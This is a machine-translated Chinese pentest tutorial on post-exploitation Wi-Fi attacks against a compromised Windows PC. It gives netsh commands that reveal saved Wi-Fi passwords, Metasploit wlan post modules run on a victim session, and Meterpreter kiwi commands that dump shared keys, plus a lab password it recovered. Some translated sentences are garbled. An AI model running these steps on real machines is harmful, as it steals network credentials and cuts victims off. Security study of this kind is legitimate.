Wifi在遠程PC上的後期開發

 

大多數Wi-Fi網絡的安全協議經常被破壞或繞過,從而將無線互聯網流量暴露給攻擊者。通過本文,我們可以瞭解獲取遠程用戶Wi-Fi基本服務集信息的不同方法以及當前網絡連接信息,以及如何提取遠程PC的已保存無線局域網配置文件,之後您將斷開目標用戶的Wi-也是。以下所有攻擊都是後期攻擊。

表中的內容

  • 介紹

  • 使用Wi-Fi

  • Wi-Fi安全類型

  • WLAN BSS列表

  • WLAN當前連接

  • WLAN配置文件

  • WLAN斷開連接

  • Mimikatz

  • Netsh的

介紹

所有無線網絡技術通常稱爲Wi-Fi。它提供高速互聯網,因爲它適用於無線電波。Wi-Fi商標歸Wi-Fi聯盟所有; 它正式定義爲無線局域網(WLAN)。它受到許多應用程序和設備的支持,例如移動電話, PDA ,操作系統,視頻遊戲控制檯等,因此,它可以讓所有設備輕鬆進行通信。

使用Wi-Fi

顧名思義, Wi-Fi 網絡在發送方和接收方之間沒有物理連接。它使用與無線電波相關的電磁頻譜內的射頻。因此,它能夠提供高速互聯網。每個Wi-Fi連接都通過接入點(AP)工作。接入點的主要工作是廣播電子設備進一步檢測到的信號。在檢測到信號時,他們連接到Wi-Fi以使用Wi-Fi。

Wi-Fi安全類型

  • 有線等效保密

  • Wi-Fi保護訪問

  • Wi-Fi保護訪問2

Netsh的

現在你有一個受害者PC的會話,轉到shell並使用以下命令找出受害者PC隨時間的Wi-Fi連接;

 

1

netsh wlan show profiles

 

201907151563204690122440.png

如上圖所示,到目前爲止,PC連接到Pentest Lab,Sinos,POCO PHONE,點燃。現在,我們可以使用以下內容獲取有關網絡的詳細信息:

 

1

netsh wlan show networks mode=bssid

201907151563204722117833.png

現在,使用以下命令查看特定Wi-Fi的密碼:

 

1

netsh wlan show profile name="ignit" key=clear

201907151563204744662110.png

WLAN BSS列表

此模塊收集有關受害計算機可用的無線基本服務集的信息。

例如,這將爲您提供有關無線連接的SSID和其他重要信息。

 

1

2

3

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

從下面給出的圖像你可以看到它在這裏發現了“5個網絡”,如Pen lab,Sinos,Ignite等以及它們的基本3個細節

201907151563204340125566.png

WLAN當前連接

此模塊收集有關目標計算機上每個無線LAN接口上的當前連接的信息。

 

1

2

3

msf > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

下面給出的圖像已經公開了“筆實驗室”是受害者連接的當前連接,而且它已經顯示了一些基本細節,例如路由器的MAC地址,安全狀態,認證類型等。  

201907151563204381116562.png

WLAN配置文件

此模塊提取已保存的無線LAN配置文件 它還將嘗試解密網絡密鑰材料。在WPA中,OS版本之間的行爲略有不同。在Windows Vista / 7中,我們將獲得密碼。在Windows XP中,我們將獲得PBKDF2派生的密鑰。

 

1

2

3

msf post> use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

從下面給出的圖像中你可以看到它已經提取了受害者連接的wifi配置文件,而且它還解密了共享密鑰(密碼)。因此,您可以確認“Pen Lab”的密碼是“ ignite @ 123 ”。  

201907151563204423174456.png

WLAN斷開連接

此模塊斷開指定接口上的當前無線網絡連接。

 

1

2

3

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_bss_list) > set session 5

msf post(wlan_disconnect) > exploit

從下面的圖像中,您可以確認它正在斷開受害者與當前無線網絡的連接。

201907151563204483576258.png

Mimikatz

我將其稱爲後期利用工具包,因爲它具有許多功能,遠遠超出了轉儲純文本密碼的能力。

 

1

meterpreter > load kiwi

 

201907151563204515273022.png

 

1

meterpreter > help

這將爲您提供包含密碼的整個無線連接列表。瞧!你做對了。

 

1

2

meterpreter > wifi_list

meterpreter > wifi_list_shared

  從下面給出的圖像中,您可以確認它已轉儲所有共享密鑰(密碼)並驗證其各自的SSID。

201907151563204978509345.png

關於作者

Nisha Yadav接受過道德認證和Bug Bounty Hunter培訓。她目前在Hiddenramp擔任安全分析師。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章